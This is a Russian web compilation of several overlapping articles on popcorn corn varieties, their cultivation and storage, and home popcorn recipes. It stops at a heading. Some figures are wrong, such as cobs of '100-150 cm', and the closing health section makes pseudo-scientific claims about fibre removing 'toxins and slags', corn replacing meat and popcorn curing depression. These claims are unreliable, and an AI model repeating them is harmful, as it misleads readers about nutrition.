0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Какой сорт кукурузы нужен для попкорна

Какая нужна кукуруза для попкорна: выбираем подходящий сорт, обрабатываем зерна и готовим их в домашних условиях

Все мы помним тот манящий запах, который не дает нам покоя, когда идем в кинотеатр. Конечно же, это попкорн! Но как приготовить такую вкуснятину дома? Давайте выясним это!

Какая нужна кукуруза для попкорна

Далеко не каждый сорт кукурузы подходит для приготовления этого блюда. Вся суть процесса в том, что в каждом зерне кукурузы, подходящем для приготовления попкорна, находится капля воды, содержащая крахмал.

Когда вода нагревается, то превращается в пар. Он же под давлением от температуры высвобождается из стенок семени, что вызывает мини-взрыв.

Подходящие сорта

Кукуруза, подходящая для попкорна, содержит меньший процент крахмала, чем обычная. К тому же в ее составе жиров и протеинов на 21% больше по составу. Семена выглядят блестящими и лакированными, их стенки намного тоньше, чем у других видов.

Есть много сортов кукурузы, подходящих для приготовления. Выделим самые популярные и проверенные:

  • Вулкан — высота растения достигает 200 см, а длина початка до 20 см. Считается идеальным для приготовления поп-корна.
  • Лопай-лопай — размер растения достигает средних параметров, до 150 см. Сорт считается ранним или среднеранним, созревает раньше других видов. Его семена приобретают оранжевый оттенок и на вид широкие.
  • Зея — хорошо запоминающийся сорт кукурузы. Его семена ярко бордового цвета. Рост стебля достигает 180 см, а длина самого початка 20-25 см.
  • Пинг-понг — растение, достигающее в длину 220 см. Плоды маленького размера, по 100-150 см, а семена продолговатой формы.
  • Гостинец — сорт кукурузы, хорошо переносящий жару. Его размер около 200 см, а початки достигают 20-25 см.
  • Внучкина радость — самый урожайный сорт, он прихотлив и требует хорошего ухода. Необходимо часто поливать. При хорошем уходе неплохо переносит болезни. Считается раннеспелым и по размеру невысоким, около 150 см, плоды тоже маленькие — 12-15 см.
  • Красная — красивый вид кукурузы. Можно назвать его декоративным. Его плоды насыщенного красного цвета, что понятно из названия. Невысокий, достигает 150 см и маленькие кочаны.

При выборе сорта для посадки стоит ориентироваться на регион и климат. Чтобы собрать хороший урожай, создавайте правильные условия для произрастания.

Можно ли сделать попкорн из обычной?

Теоретически сделать попкорн из обычной кукурузы, или, как ее еще называют — маис, возможно, но вряд ли результат вас удовлетворит. Зерна будут раскрываться не все, а те, что раскроются, не будут такими воздушными, как из подходящих для этой цели сортов.

Дело в том, что обычные сорта внутри зерна не содержат необходимого количества воздуха, чтобы происходил взрыв. А чтобы он все-таки произошел нужно сформировать большое давление, около 200 градусов. Для этого потребуется специальное оборудование.

Поэтому лучше выбирать нужные сорта кукурузы заранее или же, если вы выращиваете в домашних условиях, приобрести семена нужных сортов.

Нюансы выращивания и хранения

Выращивание этого растения не представляет особых сложностей. Кукуруза для попкорна и обычная кукуруза по способу посадки и ухода очень похожи. Рассмотрим некоторые нюансы.

Корни развиваются медленней, чем у злаковой кукурузы, также растение не любит сухой почвы, требует частого полива и может плохо расти, если не пропалывать.

Кукуруза для попкорна теплолюбива, поэтому сажать лучше в начале мая. В вырытую лунку кладется 1-2 зерна. По рекомендации, лучше сажать там, где ранее произрастали пасленовые: картофель, помидоры и др. Так как может произойти опыление с другими культурами, посадку осуществляйте отдельно от других видов.

Запомните правила, выполнение которых приведет к здоровым початкам и большому урожаю:

  1. Производите боронирование почвы перед посадкой растений.
  2. Около трех раз за весь период произрастания делайте межрядную культивацию.
  3. Один раз в неделю поливайте кукурузу, это минимум.
  4. Не забывайте удобрять почву в прикорневой системе органикой или минералами.

Если соберете кукурузу для попкорна недозрелой, то употребляйте ее в пищу как обычную сахарную. Но приготовить попкорн из нее не удастся.

Собирать кукурузу лучше на самой последней стадии, когда зрелый початок начинает высыхать и покрывается блестящей корочкой. Такие семена стоить заготовить и для дальнейшей посадки. Хранить лучше всего прямо на стеблях. Для этого дожидаемся, когда растение начнет высыхать полностью вместе с початками, это где-то конец лета и начало осени. Не стоит собирать кукурузу раньше и сушить дома, она будет плохо взрываться.

Сухие початки выламывают и досушивают около месяца в прохладном и сухом месте. Складывайте их в тряпочные сумки или бумажные пакеты. Хорошо подойдет для хранения чердак или шкаф. Если есть вероятность и засушить слишком початки сильно, на несколько недель отправьте урожай в более влажное место. Это погреб или балкон.

Обработка и подготовка зерен для попкорна

Специальная обработка зерен для попкорна не нужна. Правильно храните и собирайте урожай. Единственная рекомендация — поместить зерна на 20 минут в морозилку. Из-за резкого перепада температуры они будут лучше взрываться.

Как приготовить попкорн в домашних условиях

Традиционное приготовление попкорна в домашних условиях осуществляется в кастрюле или в сковороде. В кинотеатрах используют специальные машины для попкорна, в которых установлены специальная нагревательная пластина и воздушный нагрев для того, чтобы минимизировать подгорание продукта.

Конечно, невыгодно приобретать такой аппарат для домашнего использования, лучше воспользоваться уже имеющимися средствами. Используйте сковороду с толстыми стенками, ее проще смазать растительным маслом.

На сковороде

Берем хорошую сковороду и ставим на огонь. Хорошо прокаливаем ее и убираем на подставку. Подготовленные зерна кукурузы высыпаем одним слоем на сковороду. Лучше, чтобы был один тонкий слой, иначе не все зерна могут прожариться. Затем поливаем растительным маслом — 1-2 ст. ложки. Хорошо перемешиваем лопаткой, чтобы все зернышки покрылись масляной пленкой. После накрываем крышкой и ставим на огонь.

Вскоре вы услышите частые хлопки. Ни в коем случае не открывайте крышку, это снизит температуру. Хорошо ориентироваться именно на хлопки при готовке. Когда периодичность достигнет одного хлопка на 3-4 секунды, еще раз встряхните сковороду и потомите на плите 5-10 секунд, а затем убирайте с огня.

Открывайте крышку аккуратно, чтобы не обжечься паром. Содержимое пересыпают в посуду, оставляют остывать. По вкусу добавляют соль или сахар.

В микроволновой печи

В микроволновке приготовить попкорн просто, но при этом блюдо получится в разы калорийней — приходится добавлять больше масла, чем при приготовлении в сковороде, так как встряхивать несколько раз уже не получится.

Порядок приготовления простой: в посуду насыпаете зерна кукурузы, поливаете их маслом и помещаете в печь. Мощность должна составлять 600 Ватт. Затем вы услышите взрывы. Когда они будут происходить с периодичностью в 3-4 секунды, доставайте готовый попкорн.

В мультиварке

Некоторые готовят в мультиварке, но если решили воспользоваться этим способом, то лучше не использовать соль в приготовлении, так как она разъедает поверхность чаши. Рецепт приготовления тот же — насыпать небольшим слоям зерна в посуду, полить маслом и выбрать режим для супа. Когда утихнут хлопки, выключайте и доставайте попкорн.

В кастрюле

Возьмите большую кастрюлю, желательно с толстыми стенками. Если имеется кулинарный спрей, обрызгайте кастрюлю изнутри растительным маслом все стенки. Насыпьте небольшое количество зерен.

Накройте кастрюлю крышкой и поставьте на огонь. Не открывайте, пока время между хлопками не будет составлять 1-3 секунды. Выключайте плиту и открывайте кастрюлю. Попкорн готов.

В специальном аппарате

Специальные аппараты используют для приготовления попкорна для продажи в общественных местах. Продаются также небольшие устройства для домашнего применения. Способ тот же самый, только здесь используется кокосовое масло. Вначале разогреваем котел 5-6 мин., затем кладем кокосовое масло.

После того как убедимся, что оно растаяло, насыпаем кукурузу. К зернам добавляйте соль или сахар, по вкусу. Разогреваем аппарат до 240 градусов и ждем окончания хлопков. После помещаем несколько раз, убедившись, что попкорн готов.

Как приготовить сладкий/соленый попкорн

Чтобы приготовить сладкий или соленый попкорн, не требуется каких-либо умений. Достаточно просто добавить соль или сахар. Но если хотите разнообразить блюдо, есть множество рецептов с добавлением различных специй, о них узнаете прочитав ниже.

Обратите внимание. Рецепт попкорна зависит от наличия или отсутствия сиропов и специй. Попкорн бывает соленым, сладким или пресным. Кроме того, попкорн — это не только фаст-фуд из кукурузы, но и составляющая некоторых интересных закусок и даже выпечки.

Добавление приправ и специй

Стандартный способ приготовления — это добавление сахарной пудры и кокосовой стружки. Иногда добавляют ваниль. Все специи добавляют в только что приготовленный попкорн, завязывают в пакет и встряхивают.

Кукуруза с карамелью — это знаменитый рецепт, используемый во всех кинотеатрах. Его рецепт очень простой:

  1. Растопите в кастрюле 30 г сливочного масла и насыпьте стакан сахара.
  2. Добавьте 2 столовых ложки воды и варите 5-7 минут, постоянно помешивая.
  3. Полейте попкорн карамелью и перемешайте.

Добавляйте в блюдо различные специи: корица, мускатный орех, паприка, а также маршмеллоу, увидите, что получится — пальчики оближешь!

Кукуруза не взрывается: что делать?

Причин, по которым кукурузные зерна не взрываются несколько:

  • зерна пересушены;
  • початки недозревшие, если их сорвали слишком рано;
  • кукуруза не взрывается от переизбытка влаги, если ее хранили неправильно;
  • кукуруза опылилась сортами, неподходящими для приготовления попкорна;
  • самая простая причина — слишком низкая температура или мощность подогрева.

Ошибки допускают при хранении кукурузы или ее выращивании, все они описаны выше. Чтобы приготовить хорошее блюдо, достаточно следовать советам. Главное — это любить попкорн и готовить с любовью.

Советы и рекомендации

Есть несколько советов, которые помогут в будущем:

  1. Сухие зерна, которые не лопнули, лучше хранить в закрытом контейнере в морозильной камере.
  2. Некоторые зерна пересушены и поэтому не лопаются. Замочите их на ночь в холодной воде. Затем хорошо обсушите.
  3. Чтобы попкорн не отсырел, снимите крышку, как только он будет готов, чтобы в посуде не образовывался конденсат, и капли воды не падали на зерна.
  4. Лучше смешивать попкорн с приправим, предварительно смешав зерна с сливочным маслом. На увлажненную поверхность лучше будет ложиться соль или сахар.

Заключение

Теперь вы знаете все, чтобы приготовить отличное блюдо! Пользуйтесь нашими подсказками и рекомендациями, чтобы наслаждаться потрясающим вкусом не только в кинотеатрах, но и дома.

Сорта кукурузы

Кукуруза бывает разных видов: сладкая, лопающаяся, разноцветная, кремнистая и т. д. Для ее успешного выращивания нужно точно определиться с сортом, ведь у каждого из них собственные нормы ухода, сбора и применения. Сорта кукурузы, их особенности и недостатки будут описаны ниже в статье.

Разновидности кукурузы

Есть несколько разновидностей кукурузы. У каждой свои особенности, поэтому в данной статье целесообразно высветить основные моменты каждого из этих подвидов.

  • Зубовидная кукуруза имеет длинные, плосковатые и большие семена. Используется для заготовки семян, кормов для животных, силоса.
  • Кремнистая – самая распространенная в разных регионах планеты. Обладает роговидной оболочкой зерен, мучнистость имеется только в центре. Используется для изготовления круп, хлопьев, муки, кукурузных палочек.
  • Крахмальная выращивается на территории Северной и Южной Америки. Стебель средней длины, созревают початки поздно. Зерно всегда круглое, рыхлое и гладкое. Выращивается для изготовления спирта, крахмала.
  • Восковидная – разновидность зубовидной кукурузы, имеет двухслойную оболочку. Верхняя часть мучнистая, в составе масса амилопектина.
  • Пленчатая кукуруза является наименее распространенной, так как ее не используют в хозяйстве. Характеризуется кочаном, покрытым плоскими колосковыми чешуйками.

Также существуют сахарные, лопающиеся и цветные разновидности, но о них пойдет речь ниже.

Какие сорта кукурузы самые лучшие?

К лучшим сортам относятся самые распространенные гибриды, выращиваемые в разных странах и доступные для приобретения в виде свежих початков и семян. Почему гибриды? Потому что именно они отличаются неприхотливостью в уходе, высокими качествами самих растений и початков.

Самые лучшие сорта кукурузы

  • «Трофи F1» созревает за 75 дней со дня посевов. Для успешного выращивания важно не загущать семена во время посадки. Растет стебель до 2 метров. Початок средних размеров – 23 см, весом до 220 грамм. Сладкие зерна имеют насыщенный желтый окрас. Можно употреблять в свежем виде и консервировать.
  • «Лендмарк F1» – гибрид, созревающий за 73-83 дня. Сладкий, может храниться длительное время. Кочан до 21 см, стебель растет до 195 см. На каждом имеется до 2 початков. Транспортабелен, возможна машинная уборка. Стойкий к болезням, высокоурожайный, употребляется в свежем виде, консервируется.
  • «Екселент» – сахарный гибрид русской селекции. Кочаны длинные – до 30 см. Главное условие ухода – обильный полив. Требует своевременных опрыскиваний, так как к болезням и вредителям восприимчив.
  • «Воронежская 80-А» – раннеспелый сорт сахарной кукурузы. Очень популярен для посадки на территории России. Экспортируется, используется для консервирования, употребления в свежем виде. Имеет приятные фруктовые нотки, содержание сахара – 14%. Урожайность 45-50 ц/га.

Какие сорта кукурузы самые сладкие?

Сахарные сорта кукурузы, они же сладкие, как правило, отличаются ранним сроком созревания, имеют большие, плотные кочаны, нежные по структуре зернышки. Считается, что чем моложе початок, тем слаще он будет. При высыхании зерна этих сортов сморщиваются.

Самые сладкие сорта кукурузы

  • «Добрыня» имеет крупные кочаны, очень сладкие. Растет растение до 170 см в высоту, раннеспелая разновидность – 70 дней от появления всходов. Сорт неприхотлив к месту посадки, почве, уходу. Устойчив к ржавчине, мозаике и увяданию.
  • «Лакомка» – высокоурожайный сорт. Имеет повышенный иммунитет к наиболее распространенным болезням, раннеспелый (75 дней от всходов). Используется для свежего потребления, консервирования.
  • «Ранняя золотая 401» – невысокий, среднеспелый вид. Кочаны растут до 19 см, употребляются, обычно, пока еще совсем молодые – молочные, позже они теряют свои восхитительные вкусовые качества. Устойчив к большей части грибковых и бактериальных заболеваний.
  • «СпиритF1» выращивается рассадным методом и уже через 60 дней после посадки на постоянное место дает урожай. Кочаны растут до 20 см.
  • «Днепровская 925» – дает 75% выхода готовой продукции! Урожайность 60-70 кг/сотки. В плане ухода важно вовремя проводить полив, в остальном проблем не возникает.

К сладким сортам кукурузы стоит также отнести: «Мегатон F1» и «Трофи F1».

Сорта кукурузы для попкорна

Для изготовления попкорна берется не любой вид кукурузы, о только определенные разновидности, так называемые, лопающиеся. В них всегда мало крахмала, высокое содержание жиров, протеина и крепкая кожура. Благодаря всему этому во время нагревания зерна буквально лопаются.

Сорта кукурузы для попкорна

  • «Эрликон» имеет в составе до 13% сахаров, что весьма необычно для лопающихся видов. После обжарки имеет приятный аромат, очень нежный, изысканный вкус, который по нраву даже гурманам!
  • «Лопай-лопай» – среднего срока созревания. Растение растут до 170 см, кочаны достигают 21 см. Устойчив к болезням. Зерна желтые.
  • «Зея» – красная разновидность, наиболее популярна и распространена в Перу. Экспортироваться стала недавно, поэтому все еще считается редкой в странах Европы и Азии. Растет до 180 см в высоту, початки среднего размера – 20 см. Созревает рано только в сухом климате.
  • «Вулкан» – один из лучших видов для попкорна. Растет до 2 метров, кочаны длинные – 22 см и более. Зерна рисовой формы, желтые. Устойчив к изменениям климата и болезням.

Сюда же стоит причислить: «Пинг-понг», «Рисовая», «Карусель», «Внучкина радость», «Гостинец».

В чем особенность цветных сортов?

Кукурузу сорта Glass Gem нельзя съесть вареной, но из нее получается отличный попкорн

Все большую популярность приобретают цветные сорта кукурузы. Их главная особенность – неприхотливость (фиолетовые сорта очень легко выращивать) и высокие качественные показатели (красная кукуруза, выращиваемая в Перу, является рекордсменом по содержанию некоторых полезных веществ).

Цветная кукуруза бывает черной, фиолетовой, красной, радужной и т. д. Среди самых известных сортов нужно выделить: «Glass Gem», «Раннее Розовое Сияние», «Земляничная», «Оахаканская красная», «Перламутр», «Mini Striped», «Чудо шишка красная», «Кровавый мясник», «Black Waxy Corn», и др.

Кукуруза для попкорна: из каких сортов делают, выращивание

Кукуруза для попкорна – новинка, которую можно вырастить на даче. Сегодня в продаже представлены сорта этого удивительного растения. Выращивать его не сложнее, чем обычную кукурузу, а в результате можно получить много хрустящего попкорна.

Из какого сорта кукурузы делают попкорн

Не каждая кукуруза при растрескивании превращается в попкорн. Для этого нужно выбирать специальные сорта. Они имеют ряд особенностей:

  1. Содержание крахмала в 2 раза ниже, чем в сахарной кукурузе, но жиров и белков значительно больше.
  2. Зерна для попкорна покрыты прочной, но очень тонкой блестящей оболочкой. Именно поэтому влага равномерно распределяется по зерну и распушивает мякоть при нагревании.

Если кукурузу для попкорна правильно выращивали и хранили до нагревания, то практически все зерна лопаются. Процент нераскрывшихся составляет всего 1-2% от общей массы.

Чтобы отличить сорта кукурузы для попкорна от сахарных, достаточно посмотреть на фото.

Особенности выращивания кукурузы на попкорн

Сорта кукурузы, которые подходят для производства попкорна, очень требовательны к условиям выращивания. Такую культуру сажают только в регионах с мягким климатом, так как от появления всходов до начала цветения колебания температуры губительны для кукурузы. В процессе созревания початки нуждаются в прохладе, что легко достичь, так как в конце лета ночи становятся менее жаркими.

Выращивают культуру для попкорна на плодородном грунте, иначе богатого урожая ожидать не приходится. Песчаный и слишком легкий субстрат для нее не подходит, так как корням сложно удержаться на такой почве. Сорняки быстро угнетают всходы, им недостает влаги.

Планируя посадки на участке, нужно соблюдать агротехнику кукурузы. Самыми удачными предшественниками будут:

И другие ранние культуры, после сбора которых земля успевает восстановиться.

Лучшие сорта кукурузы для попкорна

Собрать хороший урожай с сортов лопающейся кукурузы можно, если выращивать ее в подходящем климате и местности. Разновидностей много, вот названия самых востребованных сортов для попкорна:

  • Вулкан;
  • Красный попкорн;
  • Внучкина радость;
  • Пинг-понг;
  • Гостинец.

Они дают много товарных кочанов с красивыми ровными зернами. Из подробного описания каждого сорта можно узнать особенности выращивания.

Вулкан

Сорт Вулкан устойчив к болезням и вредителям, хорошо переносит капризы погоды. Кукуруза средняя по срокам созревания. Растения рослые, более 1,5 м в высоту. Початки большие – 20-25 см длиной. Зерна в форме риса, ярко-желтого цвета. С одного початка можно набрать до 200 г кукурузы.

Красный попкорн

К раннеспелым сортам лопающейся кукурузы относится популярный Красный попкорн. Растения средней силы роста, иногда достигают 1,2 м в длину. Початки небольшие, но с хорошими вкусовыми качествами. Длина одного составляет 5-10 см. Зерна окрашены в ярко-красный цвет, напоминают клубнику. Форма семян округлая.

Красный попкорн очень требователен к поливу, но выращивать его можно в уплотненной посадке.

Внучкина радость

Сорт Внучкина радость быстро вступает в плодоношение, уже через 80 дней после посадки собирают товарные кочаны. Растения невысокие, отличаются хорошей урожайностью. Стебли кукурузы вытягиваются до 1,5 м. Длина початков – не более 12 см. Зерна окрашены в светло-бежевый оттенок.

Пинг-понг

Початки попкорна Пинг-понг созревают на 95-110-й день выращивания. Они небольшие, длиной всего 10-12 см, но очень вкусные. Зерна окрашены в желтый цвет, округлые. Растение высокорослое, требует достаточно места для выращивания. Побеги мощные, достигают 2 м в высоту.

Гостинец

Гибрид попкорна Гостинец хорошо переносит засуху, устойчив к полеганию. Растения мощные, дотягивают до 2,2 м. Початки большие – около 25 см в длину. Зерна крупные, выровненные, насыщенного желтого цвета. Сорт среднеспелый, уже на 80-й день выращивания можно собирать початки.

Посадка и выращивание кукурузы на попкорн

Сажать и выращивать кукурузу для попкорна нужно, когда минует угроза заморозков. Семена заделывают только в хорошо прогретую почву, иначе они загниют. Предварительно грядку глубоко рыхлят, убирают сорняки и удобряют.

Правила посадки

Сажают кукурузу для попкорна рядами или квадратно-гнездовым способом. В одну лунку кладут несколько зерен сразу, после появления всходов их прореживают. Оставляют только самые сильные.

При рядовом способе соблюдают следующую схему посадки:

  • 50 х 50 см;
  • 40 х 60 см;
  • 30 х 70 см.

К посадке приступают не раньше мая, иначе всходы попадут под заморозки. Оптимально в первой половине месяца, чтобы в период цветения и созревания кукурузы температура на улице не была такой высокой.

Уход за кукурузой на попкорн

Сорта кукурузы для попкорна нуждаются в тщательном уходе. Междурядья рыхлят несколько раз за сезон, чтобы воздух хорошо проходил к корням. К тому же рыхление помогает бороться с сорняками, которые мешают растениям нормально развиваться.

Лопающаяся кукуруза нуждается в обильном поливе. Посадки увлажняют не менее 2 раз в неделю. В период засухи можно поливать чаще. Влага должна проникнуть на всю глубину залегания корней.

На этапе выращивания очень важны подкормки, так как почва быстро истощается под кукурузой. Растения хорошо отзываются на минералы и органику, которую вносят раз в 2 недели. Удобрения чередуют.

Опытные садоводы рекомендуют вносить подкормки по следующей схеме:

  • с ростом 5-6-го листа – раствор мочевины;
  • в период образования метелок дают нитроаммофоску или азофоску;
  • с ростом початков вносят калийные удобрения.

Для увеличения урожайности растения пасынкуют. Процедуру делают в фазе 6-8 листьев. Все боковые побеги в пазухах удаляют.

Уход за кукурузой для попкорна включает в себя и искусственное опыление. Следует помнить, что растения опыляются ветром, поэтому в безветренную погоду метелки нужно периодически встряхивать. Цветение длится декаду, за это время нужно трижды повторить процедуру. Если этого не делать, то семечки будут плохо завязываться. Кочаны образуются неохотно и сами неполные.

Сбор и хранение кукурузы для попкорна

Собирать кукурузу для попкорна нужно полностью созревшей, початки не снимают в стадии молочной зрелости. Они должны самостоятельно подсохнуть на стеблях. В этот период зерна приобретают нужную оболочку, становятся блестящими как стекло. Влажность остается на уровне 20%.

В каждом регионе сроки сбора урожая разнятся, но все придерживаются рекомендаций производителя семян. Уборку проводят с августа по октябрь. В зависимости от срока вегетации растения. Ранние сорта убирают не позднее середины сентября. Сбор поздних продлевают до октября.

После уборки кочаны нужно хорошо просушить. Для домашнего использования, когда початков немного и их не нужно долго хранить, достаточно хорошо высушить в тенистом месте. Далее, зерна нужно обмолотить и закладывать на хранение. Их складывают в тканевый мешок из натурального волокна или бумажный пакет. Можно хранить и в початках, причем при этом способе срок увеличивается.

Особое внимание просушке уделяют, когда початков много. В промышленных масштабах сушат кукурузу в 2 этапа. Сначала просушивают на поле, после чего – в хорошо проветриваемом помещении.

Хранить початки или обмолоченные зерна кукурузы в промышленных масштабах нужно с учетом влажности:

  1. Когда она выше 20%, придерживаются вертикального или горизонтального способа, помещение должно хорошо проветриваться. Высота гурта – не более 2 м.
  2. Если она в пределах 18-20%, то насыпь делают высотой 2,5 м. Помещение хорошо проветривают.
  3. Когда она в районе 16-18%, гурты формируют высотой 3 м.
  4. Если она не превышает 16%, то насыпь – не более 1 м.

Высота помещения в любом случае должна быть не менее 3,5 м.

Способы приготовления попкорна в домашних условиях

Сделать попкорн в домашних условиях можно очень просто. Самый обычный способ – сложить зерна в сковороду с толстым дном, накрыть крышкой и нагревать. В процессе сушки зерна лопнут.

Следующий рецепт для любителей сладкого попкорна. Для его приготовления понадобится СВЧ-печь.

  • зерна;
  • растительное масло;
  • сахарный песок.

  1. В стеклянную кастрюлю для микроволновки сложить зерна небольшим слоем. Полить растительным маслом, хорошо перемешать и накрыть крышкой.
  2. Установить мощность на печи в пределах 600-700 Вт. Дождаться, пока все зерна не раскроются. Осторожно вытащить кастрюлю.
  3. Горячий попкорн посыпать сахарной пудрой.

Можно в сахар добавить молотую корицу. По этому же рецепту готовят и соленый попкорн под пиво. Заменяя сахар мелкой солью.

Очень вкусным получается карамельный попкорн. Для его приготовления зерна поджаривают любым способом, после чего покрывают сладкой глазурью. Ее готовят из 1 ст. сахара и 30 г сливочного масла. Смесь варят 10 мин. на медленном огне, пока она не поменяет цвет, после чего добавляют немного воды. Карамель хорошо перемешивают и горячей поливают на попкорн.

Заключение

Кукуруза для попкорна набирает популярность. Ее все чаще выращивают на даче взамен сахарной. Правильно выбранные сорта и соблюдение всей технологии посадки гарантируют высокий урожай.

Кукуруза для попкорна: разбираем сорта и методику приготовления

Сложно найти человека, который бы не знал, что же такое попкорн. Еще пару десятилетий назад мы видели его только в зарубежных фильмах, где люди ели причудливые шарики во время похода в кино или дома перед телевизором. Но границы стали более прозрачны, техника и технологии не стоят на месте, и сейчас уже в нашей стране стаканчиком с воздушной кукурузой никого не удивишь. Но многие задаются вопросом, а можно ли вырастить культуру в нашем климате, вся ли кукуруза для попкорна подходит или только определенные сорта. Мы решили разобраться в этом вопросе.

Традиция есть попкорн

Да, сейчас сложно увидеть человека, который бы шел в кино, в парк гулять и не покупал стаканчик попкорна, если он продается в данном месте. Дети просто без лакомства не могут себе представить прогулку, ведь сейчас воздушная кукуруза имеется на любой вкус. Есть сладкая, соленая, с карамелью, зефиром и в составе разных десертов. Только вот одно но, ученые в наши дни считают, что данное лакомство, без которого уже не могут представить себе поход в кинотеатр миллионы людей, вредно, ведь производители не скупятся на добавки.

Что не удивительно, в наш век сами культуры выращиваются повсеместно при использовании химикатов с целью получения быстрого и высокого урожая. Так, на этом все не останавливается, ведь чтобы сделать продукты вкуснее, ради их большей продажи в состав кладут очень много добавок. Часто о них мы даже не знаем, так как не всегда информация на упаковке достоверная. И резонный вопрос возникает у людей, которые заботятся о своем здоровье и будущем своих детей, как сделать попкорн из кукурузы, какой сорт нужен, можно ли его вырастить самим, к примеру, на даче. Мы вас обрадуем, все это возможно, и вы узнаете далее как.

История возникновения попкорна

О сортах, агротехнике и рецептам поговорим чуть позже, а пока хотим рассказать, откуда же такое лакомство появилось у людей. Вы не поверите, но ему уже много столетий, и открыли попкорн индейцы. Как и многие великие открытия или не такие значительные, но полезные и интересные, и попкорн можно отнести именно к последним, роль сыграл случай. Индейские племена, которые в своем рационе всегда едят кукурузу или маис, однажды обнаружили, что некоторые початки почему-то начинают взрываться.

Конечно, это не могло не заинтересовать находчивый народ, и они стали готовить попкорн двумя способами. Первый вариант – это початки клали в масло и томили над костром, второй – это зерна из кукурузы вынимали, складывали в мешочек и парили над пламенем. И вот так и появился первый попкорн в мире, постепенно лакомство распространилось. Уверенны, многие, вообще, не понимают, как все происходит, почему кукуруза взрывается и принимает причудливую форму. Мы объясним далее.

Взрыв зерен и вуаля попкорн готов или как все возможно

Почему кукуруза взрывается?

Кукуруза всем нам известна, никого не удивляет, но не стоит ее жарить и ожидать попкорна, так как только определенные сорта способны на сие деяние. Если серьезно, то, да, сорта кукурузы для попкорна есть разные, это не какой-то редкий вид, мы вам расскажем далее их названия. Отличие в том, что внутри зерна находится капля воды, в ней есть крахмал. Реакция очень проста – при термической обработке или, проще говоря, когда вы нагреваете зерна, вода трансформируется в пар, расширяется и ей тесно внутри, и, да, происходит типичный взрыв. Кстати, стенки сортов кукурузы для попкорна тоньше, нежели обычные.

Для сведения! В цивилизованный мир попкорн попал примерно в 1519 году, и как часто случается не без участия мореплавателя. И это был не Колумб, а Кортес. Он и привез блюдо в Европу.

Вот так все просто. И вы можете вырастить культуру на своем участке, это несложно сделать, собрать урожай и приготовить для всей семьи вот такой перекус или десерт. Главное, что продукт будет экологически чистым, а значит полезным для здоровья. Ведь, как и многие дары природы, кукуруза тоже имеет свой питательный и нужный нам состав — витамины, минералы, клетчатка. При этом подходит и для детей, и для взрослых, и для худеющих.

Сорта для попкорна

Если у вас есть дача или свой дом, то выращивайте свою кукурузу, ну а сорта для попкорна мы вам советуем следующие:

  • «Лопай-лопай». Хороший сорт, зерна насыщенного оранжевого цвета, сама же культура не растет высокой. Относится к среднеранним;
  • «Пинг-понг». Внушительных размеров куст — до 2.3 метра. Примечательная особенность – это небольшие початки, которых много. Сами же зерна слегка вытянуты;
  • «Вулкан». Символичное название для культуры, которая взрывается. Чуть меньше предыдущего кукурузного собрата — до 2 метров. Эти початки светлые, отличается высокой устойчивостью к заболеваниям;
  • «Зея». Можно отнести к лучшим сортам кукурузы для попкорна. Примечательная черта – это цвет зерен – они красновато-бордовые. Зреет рано, стебель в человеческий рост, початки формирует до 25-30 см.
  • «Красная». Получила характерное по цвету початков название. Они очень красивого алого цвета, растет компактным кустом — до полутора метров, часто используется для декора ландшафта;
  • «Гостинец». Сильная черта этой кукурузы – устойчивость к погодным невзгодам, а именно к палящему солнцу, засухе. Высокорослые кусты намного выше человека – до 2.3-2.5 метров. Формирует и большие початки по 25-30 см;
  • «Внучкина радость». Замечательное название, к тому же сорт имеет очень много положительных сторон – дает максимальные урожаи, не боится недугов, урожай формируется рано, неприхотлив в выращивании, початки компактные, равно как и кусты.

Как видите, каждый сорт имеет свои сильные стороны, решать вам, что посадить. Общие принципы агротехники вы прочтете уже далее. Можете экспериментировать с разными сортами и уже для себя решить, из какой кукурузы делать попкорн именно для вашей семьи, ведь все мы индивидуальны, и вкусы у всех, конечно, тоже.

Совет! Покупая семена кукурузы для выращивания, обратите внимание на информацию на упаковке от производителя, там описаны главные нюансы, и какой именно климат подходит для данной культуры. Ведь у нас страна большая, погода у всех своя.

Агротехника выращивания кукурузы для попкорна

Итак, каждый может вырастить культуру, нельзя ее отнести к тем, что растет только в теплом климате, южных регионах. Процесс практически ничем не отличается от выращивания самой простой, сахарной разновидности. Только вот сорта для попкорна не любят сорняков, почва не должна быть слишком рыхлой, чтобы хорошо могло развиваться корневище, которое, кстати, очень мощное. Также не сажайте сорта рядом, то есть сахарную кукурузу и для попкорна, так как насекомые переопылят кусты, и вы можете не получить того результата, что ожидаете.

Итак, кукуруза сажается с помощью зерен, что помещают в почву. Расстояние между саженцами должно быть не меньше 35 см, а лучше 50 или 70 см, чтобы кусты могли хорошо расти, равномерно зрел урожай. Посадки нужно поливать 1-2 раза в неделю, в засуху — 3-4 раза. Опять же это еще зависит от сорта, помните про сорняки, рыхление почвы. И вот так вы вырастите свой урожай кукурузы, из которой можно делать отличный попкорн, что будет нести пользу здоровью, и о ней далее.

Совет! Кукурузу лучше сажать после томатов, картофеля, почву заранее пробороновать, внести минеральное удобрение. Во время роста саженцев нужно участок закультивировать.

Польза попкорна для здоровья

Конечно, мы говорим только о натуральном продукте, без вредных добавок. Ну и первое, с чего бы следовало начать, – это то, что попкорн просто вкусный, и он доставляет радость, что оказывает благотворное влияние на наше эмоциональное состояние. Также продукт борется с депрессией, стрессом благодаря витамину В2 в составе. Чем же еще полезен попкорн из кукурузы?

Важно! Попкорн в продаже по всему миру содержит много синтетики. Американские ученые доказали, что продукт отрицательно влияет на здоровье, особенно это касается детей. Задумайтесь перед покупкой такого лакомства.

Продукт растительного происхождения, который богат грубым волокном или клетчаткой. Она нужна нашему кишечнику и желудку для чистки от остатков пищи, токсинов, шлаков. Грубые волокна играют колоссальную роль для нашего здоровья. Они помогают удалять все застои, что уберегает от болезней, стимулирует похудение, прилив энергии, чистится кожа, проходят некоторые недуги.

В составе много протеина, растительных жиров, которые очень хорошо питают наш организм, кукуруза вполне может заменить мясо. При этом именно сорта для попкорна этих веществ имеют на 21% больше, нежели простые виды культуры. Также в составе полифенолы и витамины группы В, которые играют непосредственную роль в работе ряда систем органов, нормализуют обмен веществ и дают нам молодость и бодрость, помогают ногтям и волосам.

Полезно знать! Из-за большого количества протеина попкорн нужно есть тем, кто занимается спортом, кто работает физически, также благотворно он влияет на людей в преклонном возрасте. Стоит помнить и то, что попкорн – это пища самостоятельная.

Ну и переходим к самой вкусной части, как сделать попкорн в микроволновке из кукурузы или на плите. Ведь урожай мы уже с вами вырастили из сортов, которые можно купить в магазине с семенами или в интернете.

Делаем воздушный попкорн дома

